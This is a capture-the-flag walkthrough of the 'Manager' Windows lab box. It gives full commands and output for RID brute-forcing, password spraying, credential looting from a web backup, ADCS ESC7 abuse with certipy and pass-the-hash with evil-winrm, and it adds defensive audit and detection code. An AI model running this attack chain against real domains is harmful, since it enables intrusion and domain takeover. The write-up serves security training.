Manager
Machine Information
| Name | OS | IP | Difficulty |
|---|---|---|---|
| Manager | Windows | 10.10.11.236 | Medium |
Background
This box starts off with null/guest access to the domain where RIDs can be brute forced. From there, weak credentials lead to the improper storage of domain credentials. Those credentials can be abused with Active Directory Certificate Services (ADCS) to compromise the domain.
Methodology
First, let's start off with an nmap scan to see what we are up against.
Nmap Scan
$ sudo nmap -Pn -n -p- -A -T4 -v 10.10.11.236 -oN nmap.txt
<SNIP>
Nmap scan report for 10.10.11.236
Host is up (0.055s latency).
Not shown: 65512 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-title: Manager
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-10-11 01:22:11Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-10-11T01:23:51+00:00; +6h59m38s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.manager.htb
| Issuer: commonName=manager-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-30T17:08:51
| Not valid after: 2122-07-27T10:31:04
| MD5: bc56:af22:5a3d:db67:c9bb:a439:4232:14d1
|_SHA-1: 2b6d:98b3:d379:df64:59f6:c665:d4b7:53b0:faf6:e07a
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.manager.htb
| Issuer: commonName=manager-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-30T17:08:51
| Not valid after: 2122-07-27T10:31:04
| MD5: bc56:af22:5a3d:db67:c9bb:a439:4232:14d1
|_SHA-1: 2b6d:98b3:d379:df64:59f6:c665:d4b7:53b0:faf6:e07a
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info:
| 10.10.11.236:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ms-sql-ntlm-info:
| 10.10.11.236:1433:
| Target_Name: MANAGER
| NetBIOS_Domain_Name: MANAGER
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: manager.htb
| DNS_Computer_Name: dc01.manager.htb
| DNS_Tree_Name: manager.htb
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-10-11T00:43:27
| Not valid after: 2054-10-11T00:43:27
| MD5: ea1d:1f81:1365:bdec:8037:f2d4:05c5:9bde
|_SHA-1: c5c9:8022:854b:b4fe:54c0:f33c:62cd:003c:1a1d:78e4
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-10-11T01:23:51+00:00; +6h59m38s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.manager.htb
| Issuer: commonName=manager-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-30T17:08:51
| Not valid after: 2122-07-27T10:31:04
| MD5: bc56:af22:5a3d:db67:c9bb:a439:4232:14d1
|_SHA-1: 2b6d:98b3:d379:df64:59f6:c665:d4b7:53b0:faf6:e07a
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.manager.htb
| Issuer: commonName=manager-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-30T17:08:51
| Not valid after: 2122-07-27T10:31:04
| MD5: bc56:af22:5a3d:db67:c9bb:a439:4232:14d1
|_SHA-1: 2b6d:98b3:d379:df64:59f6:c665:d4b7:53b0:faf6:e07a
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
<SNIP>
Host script results:
|_clock-skew: mean: 6h59m37s, deviation: 0s, median: 6h59m37s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-10-11T01:23:06
|_ start_date: N/A
<SNIP>
From the Nmap output we see a lot of open ports: the standard Active Directory ports (88, 389, 464, 593, 636, 3268, 3269), WinRM for remote management (5985), the usual Windows ports (135, 139, 445), Microsoft SQL Server (1433), and lastly a website on port 80 served by IIS. We can also see the domain name manager.htb and the host name DC01.
Near the end of the Nmap output we can also see a clock skew of about 7 hours; we fix this now so it won't be a problem later.
Website
We can try for some quick wins by browsing the website, enumerating subdomains, and searching for files and directories with a tool like ffuf, but there are no hits.
SMB & RID Bruteforce
We can check whether any shares can be enumerated as a guest.
$ smbclient --no-pass --list //10.10.11.236
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Unfortunately there are no shares we can access, but since guest access to SMB works we can enumerate all the domain users by brute-forcing their RIDs.
$ nxc smb 10.10.11.236 -u " " -p "" --rid-brute
<SNIP>
SMB 10.10.11.236 445 DC01 500: MANAGER\Administrator (SidTypeUser)
SMB 10.10.11.236 445 DC01 501: MANAGER\Guest (SidTypeUser)
SMB 10.10.11.236 445 DC01 502: MANAGER\krbtgt (SidTypeUser)
<SNIP>
SMB 10.10.11.236 445 DC01 1113: MANAGER\Zhong (SidTypeUser)
SMB 10.10.11.236 445 DC01 1114: MANAGER\Cheng (SidTypeUser)
SMB 10.10.11.236 445 DC01 1115: MANAGER\Ryan (SidTypeUser)
SMB 10.10.11.236 445 DC01 1116: MANAGER\Raven (SidTypeUser)
SMB 10.10.11.236 445 DC01 1117: MANAGER\JinWoo (SidTypeUser)
SMB 10.10.11.236 445 DC01 1118: MANAGER\ChinHae (SidTypeUser)
SMB 10.10.11.236 445 DC01 1119: MANAGER\Operator (SidTypeUser)
We now have a list of usernames that we can try to find passwords for.
Before trying any wordlists, we first try each username as its own password, as this is a common credential issue.
$ nxc smb 10.10.11.236 -u users.txt -p users.txt --continue-on-success --no-brute
SMB 10.10.11.236 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.236 445 DC01 [-] manager.htb\administrator:administrator STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\guest:guest STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\krbtgt:krbtgt STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\zhong:zhong STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\cheng:cheng STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\ryan:ryan STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\raven:raven STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\jinWoo:jinWoo STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\chinHae:chinHae STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [+] manager.htb\operator:operator
With that we now have the username:password for operator:operator.
Operator
We check again for shares we can enumerate with these credentials, but there are still none. We can also try BloodHound, but it finds no privilege escalation paths, only that Raven can log in remotely.
There is still one thing we found earlier that we can try: the SQL Server. We can use the Impacket script mssqlclient.
$ mssqlclient.py -windows-auth manager.htb/operator@10.10.11.236
Impacket v0.11.0 - Copyright 2023 Fortra
Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (MANAGER\Operator guest@master)>
Now that we have a foothold on the SQL server, we can try a handful of commands such as xp_cmdshell or xp_dirtree, which mssqlclient has built in.
We find that we do not have permission to execute commands, but we can browse for files.
SQL (MANAGER\Operator guest@master)> xp_dirtree
subdirectory depth file
------------------------- ----- ----
$Recycle.Bin 1 0
Documents and Settings 1 0
inetpub 1 0
PerfLogs 1 0
Program Files 1 0
Program Files (x86) 1 0
ProgramData 1 0
Recovery 1 0
SQL2019 1 0
System Volume Information 1 0
Users 1 0
Windows 1 0
Let's start by enumerating the website directory.
SQL (MANAGER\Operator guest@master)> xp_dirtree c:\inetpub
subdirectory depth file
------------ ----- ----
custerr 1 0
history 1 0
logs 1 0
temp 1 0
wwwroot 1 0
SQL (MANAGER\Operator guest@master)> xp_dirtree c:\inetpub\wwwroot
subdirectory depth file
------------------------------- ----- ----
about.html 1 1
contact.html 1 1
css 1 0
images 1 0
index.html 1 1
js 1 0
service.html 1 1
web.config 1 1
website-backup-27-07-23-old.zip 1 1
There is a backup of the whole website, website-backup-27-07-23-old.zip. Downloading and extracting the zip file reveals another set of Active Directory credentials, raven:R4v3nBe5tD3veloP3r!123, in the hidden file .old-conf.xml.
$ wget http://10.10.11.236/website-backup-27-07-23-old.zip
<SNIP>
$ unzip website-backup-27-07-23-old.zip
<SNIP>
$ ls -la
drwxrwxr-x 5 rro rro 4096 Oct 18 12:33 .
drwxr-xr-x 9 rro rro 4096 Oct 18 12:33 ..
-rw-rw-r-- 1 rro rro 5386 Jul 27 2023 about.html
-rw-rw-r-- 1 rro rro 5317 Jul 27 2023 contact.html
drwxrwxr-x 2 rro rro 4096 Oct 18 12:33 css
drwxrwxr-x 2 rro rro 4096 Oct 18 12:33 images
-rw-rw-r-- 1 rro rro 18203 Jul 27 2023 index.html
drwxrwxr-x 2 rro rro 4096 Oct 18 12:33 js
-rw-rw-r-- 1 rro rro 698 Jul 27 2023 .old-conf.xml
-rw-rw-r-- 1 rro rro 7900 Jul 27 2023 service.html
$ cat .old-conf.xml
<?xml version="1.0" encoding="UTF-8"?>
<ldap-conf xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<server>
<host>dc01.manager.htb</host>
<open-port enabled="true">389</open-port>
<secure-port enabled="false">0</secure-port>
<search-base>dc=manager,dc=htb</search-base>
<server-type>microsoft</server-type>
<access-user>
<user>raven@manager.htb</user>
<password>R4v3nBe5tD3veloP3r!123</password>
</access-user>
<uid-attribute>cn</uid-attribute>
</server>
<search type="full">
<dir-list>
<dir>cn=Operator1,CN=users,dc=manager,dc=htb</dir>
</dir-list>
</search>
</ldap-conf>
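The config above is a good illustration of what a backup audit should catch: a plaintext bind password and cleartext LDAP (port 389 enabled, LDAPS disabled). The following is an added example, not part of the original writeup, that audits an LDAP client config of this shape; the sample document and its placeholder password are constructed for the example.

```python
import xml.etree.ElementTree as ET
from dataclasses import dataclass

# Constructed sample in the layout of the recovered .old-conf.xml; the host,
# user and password are placeholders, not values from the box.
SAMPLE_CONF = """<?xml version="1.0" encoding="UTF-8"?>
<ldap-conf xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <server>
    <host>dc01.example.local</host>
    <open-port enabled="true">389</open-port>
    <secure-port enabled="false">0</secure-port>
    <search-base>dc=example,dc=local</search-base>
    <server-type>microsoft</server-type>
    <access-user>
      <user>svc-ldap@example.local</user>
      <password>PLACEHOLDER-PASSWORD</password>
    </access-user>
  </server>
</ldap-conf>
"""

# Element names that commonly hold a secret in application config files.
SECRET_TAGS = {"password", "passwd", "secret", "bindpassword", "token"}

@dataclass
class Finding:
    severity: str
    path: str
    message: str

def audit_ldap_conf(xml_text: str) -> list[Finding]:
    """Return findings for plaintext secrets and cleartext-only LDAP transport."""
    root = ET.fromstring(xml_text)
    findings: list[Finding] = []
    # 1. Any secret-looking element with a non-empty value is a stored credential.
    for elem in root.iter():
        if elem.tag.lower() in SECRET_TAGS and (elem.text or "").strip():
            findings.append(Finding("high", elem.tag, "plaintext credential stored in config"))
    # 2. Cleartext LDAP enabled while LDAPS is disabled: the simple bind sends
    #    the password unencrypted on the wire.
    open_port = root.find("./server/open-port")
    secure_port = root.find("./server/secure-port")
    open_on = open_port is not None and open_port.get("enabled", "false").lower() == "true"
    secure_on = secure_port is not None and secure_port.get("enabled", "false").lower() == "true"
    if open_on and not secure_on:
        findings.append(Finding("medium", "server", "simple bind over cleartext LDAP with LDAPS disabled"))
    return findings

def redact_secrets(xml_text: str) -> str:
    """Replace secret values with an environment reference so the file can be backed up safely."""
    root = ET.fromstring(xml_text)
    for elem in root.iter():
        if elem.tag.lower() in SECRET_TAGS and (elem.text or "").strip():
            elem.text = "${LDAP_BIND_PASSWORD}"
    return ET.tostring(root, encoding="unicode")
```

Run the audit over every XML file in an extracted backup before it is published anywhere; a single "high" finding means the archive should be treated as a credential leak.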
Raven
With Raven's credentials, knowing Raven can log in remotely and that WinRM is open, we can use evil-winrm to get a shell on the box.
$ evil-winrm -i 10.10.11.236 -u raven -p 'R4v3nBe5tD3veloP3r!123'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Raven\Documents>
We can submit the user flag!
Another thing we can try with the Raven account, which we did not do with the Operator account, is running certipy to see whether ADCS is exploitable.
$ certipy find -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -vulnerable -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Trying to get CA configuration for 'manager-DC01-CA' via CSRA
[*] Got CA configuration for 'manager-DC01-CA'
[*] Enumeration output:
Certificate Authorities
0
CA Name : manager-DC01-CA
DNS Name : dc01.manager.htb
Certificate Subject : CN=manager-DC01-CA, DC=manager, DC=htb
Certificate Serial Number : 5150CE6EC048749448C7390A52F264BB
Certificate Validity Start : 2023-07-27 10:21:05+00:00
Certificate Validity End : 2122-07-27 10:31:04+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : MANAGER.HTB\Administrators
Access Rights
Enroll : MANAGER.HTB\Operator
MANAGER.HTB\Authenticated Users
MANAGER.HTB\Raven
ManageCertificates : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
ManageCa : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
MANAGER.HTB\Raven
[!] Vulnerabilities
ESC7 : 'MANAGER.HTB\\Raven' has dangerous permissions
Certificate Templates : [!] Could not find any certificate templates
We can see that ESC7 is exploitable. The Certipy GitHub README describes it:
ESC7 is when a user has the Manage CA or Manage Certificates access right on a CA. There are no public techniques that can abuse the Manage Certificates access right for domain privilege escalation, but it can be used to issue or deny pending certificate requests.
It also goes into detail as to which commands to run.
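The ESC7 finding comes down to one check: a principal outside the CA administrator groups holds ManageCa or ManageCertificates. The following added example, not part of the original writeup or of Certipy, parses the Permissions block in the textual layout shown above and reports such principals; the sample output and names are constructed.

```python
import re
from collections import defaultdict

# Constructed sample mirroring the layout of the certipy find output above;
# the domain and principal names are placeholders, not the box's.
SAMPLE_FIND_OUTPUT = """\
Permissions
  Owner : CORP.LOCAL\\Administrators
  Access Rights
    Enroll : CORP.LOCAL\\Operator
             CORP.LOCAL\\Authenticated Users
             CORP.LOCAL\\Raven
    ManageCertificates : CORP.LOCAL\\Administrators
                         CORP.LOCAL\\Domain Admins
                         CORP.LOCAL\\Enterprise Admins
    ManageCa : CORP.LOCAL\\Administrators
               CORP.LOCAL\\Domain Admins
               CORP.LOCAL\\Enterprise Admins
               CORP.LOCAL\\Raven
"""

# Groups expected to hold CA management rights on a default CA installation.
EXPECTED_CA_ADMINS = {"administrators", "domain admins", "enterprise admins"}
RIGHT_LINE = re.compile(r"^\s*(Enroll|ManageCertificates|ManageCa)\s*:\s*(.+?)\s*$")

def parse_access_rights(text: str) -> dict[str, list[str]]:
    """Map each access right to the principals listed under it.

    A right starts on a 'Right : principal' line; further principals for the
    same right follow on indented lines that carry a DOMAIN\\name but no colon.
    """
    rights: dict[str, list[str]] = defaultdict(list)
    current = None
    for line in text.splitlines():
        m = RIGHT_LINE.match(line)
        if m:
            current = m.group(1)
            rights[current].append(m.group(2))
        elif current and "\\" in line and ":" not in line:
            rights[current].append(line.strip())
        else:
            current = None  # any other line ends the current right's list
    return dict(rights)

def esc7_exposures(rights: dict[str, list[str]]) -> list[tuple[str, str]]:
    """Return (right, principal) pairs where a non-admin principal can manage the CA."""
    hits = []
    for right in ("ManageCa", "ManageCertificates"):
        for principal in rights.get(right, []):
            name = principal.split("\\", 1)[-1].lower()
            if name not in EXPECTED_CA_ADMINS:
                hits.append((right, principal))
    return hits
```

Anything this returns should be removed from the CA's security settings unless there is a documented reason for that account to manage the CA.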
First we want to add Raven as a CA officer, which gives Raven the ManageCertificates access right.
$ certipy ca -username raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -add-officer raven -ca manager-DC01-CA
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Successfully added officer 'Raven' on 'manager-DC01-CA'
Running the earlier certipy find command again shows Raven with ManageCertificates access.
$ certipy find -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -vulnerable -stdout
<SNIP>
ManageCertificates : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
MANAGER.HTB\Raven
ManageCa : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
MANAGER.HTB\Raven
[!] Vulnerabilities
ESC7 : 'MANAGER.HTB\\Raven' has dangerous permissions
Certificate Templates : [!] Could not find any certificate templates
We can now request a certificate from the SubCA template.
$ certipy req -username raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -ca manager-DC01-CA -template SubCA -upn administrator@manager.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
[*] Request ID is 28
Would you like to save the private key? (y/N) y
[*] Saved private key to 28.key
[-] Failed to request certificate
Keep track of the request ID, as it is used in the next couple of commands.
From here we can issue the certificate request using our ManageCertificates right.
$ certipy ca -ca manager-DC01-CA -issue-request 28 -username raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Successfully issued certificate
Once the certificate has been issued, we can retrieve it with the following.
$ certipy req -ca manager-DC01-CA -retrieve 28 -username raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Rerieving certificate with ID 28
[*] Successfully retrieved certificate
[*] Got certificate with UPN 'administrator@manager.htb'
[*] Certificate has no object SID
[*] Loaded private key from '28.key'
[*] Saved certificate and private key to 'administrator.pfx'
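The chain above (CA permissions changed by a non-admin, then a denied request for another user's UPN being issued by that same account) is visible to the CA's own auditing. The following added example, not from the original writeup, correlates simplified CA audit events to flag it; the events are constructed and their field names are an assumption for this example (real 4882/4886/4887 events carry more, differently named fields).

```python
from dataclasses import dataclass
from datetime import datetime, timedelta

# Constructed, simplified CA audit events. Field names are assumed for this
# example; real Windows Certification Services events are richer.
SAMPLE_EVENTS = [
    {"time": "2024-10-11T01:30:00", "id": 4882, "actor": "raven@corp.local", "ca": "corp-DC01-CA"},
    {"time": "2024-10-11T01:31:10", "id": 4886, "actor": "raven@corp.local", "ca": "corp-DC01-CA",
     "request_id": 28, "template": "SubCA", "san_upn": "administrator@corp.local"},
    {"time": "2024-10-11T01:32:05", "id": 4887, "actor": "raven@corp.local", "ca": "corp-DC01-CA",
     "request_id": 28},
    {"time": "2024-10-11T02:10:00", "id": 4886, "actor": "jdoe@corp.local", "ca": "corp-DC01-CA",
     "request_id": 29, "template": "User", "san_upn": "jdoe@corp.local"},
    {"time": "2024-10-11T02:10:30", "id": 4887, "actor": "jdoe@corp.local", "ca": "corp-DC01-CA",
     "request_id": 29},
]

# 4882: CA security permissions changed; 4890: certificate manager settings changed.
CA_PERMISSION_CHANGE = {4882, 4890}
WINDOW = timedelta(hours=1)

@dataclass
class Alert:
    request_id: int
    requester: str
    san_upn: str
    severity: str

def detect_esc7_chain(events: list[dict]) -> list[Alert]:
    """Flag issued requests (4887) whose SAN UPN is not the requester, and escalate
    when the requester changed CA permissions within WINDOW beforehand."""
    events = sorted(events, key=lambda e: e["time"])
    perm_changes: dict[str, datetime] = {}   # actor -> time of last CA permission change
    requests: dict[tuple, dict] = {}         # (ca, request_id) -> the 4886 event
    alerts: list[Alert] = []
    for e in events:
        t = datetime.fromisoformat(e["time"])
        if e["id"] in CA_PERMISSION_CHANGE:
            perm_changes[e["actor"].lower()] = t
        elif e["id"] == 4886:
            requests[(e["ca"], e["request_id"])] = e
        elif e["id"] == 4887:
            req = requests.get((e["ca"], e["request_id"]))
            if req is None or req["san_upn"].lower() == req["actor"].lower():
                continue  # normal case: the certificate is for the requester themselves
            recent = perm_changes.get(req["actor"].lower())
            severity = "critical" if recent and t - recent <= WINDOW else "high"
            alerts.append(Alert(e["request_id"], req["actor"], req["san_upn"], severity))
    return alerts
```

Even the "high" case alone (a certificate issued for a UPN other than the requester's) is worth an alert in an environment where no template permits user-specified SANs.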
Administrator
The last step is to use certipy once more to retrieve the NT hash for the administrator account.
$ certipy auth -pfx administrator.pfx -dc-ip 10.10.11.236
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@manager.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@manager.htb': aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef
We now have the NT hash for administrator: ae5064c2f62317332c88629e025924ef. Using evil-winrm again, we can log in as administrator by passing the hash.
$ evil-winrm -i 10.10.11.236 -u administrator -H ae5064c2f62317332c88629e025924ef
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
Congrats! We can now submit the root (administrator) flag!
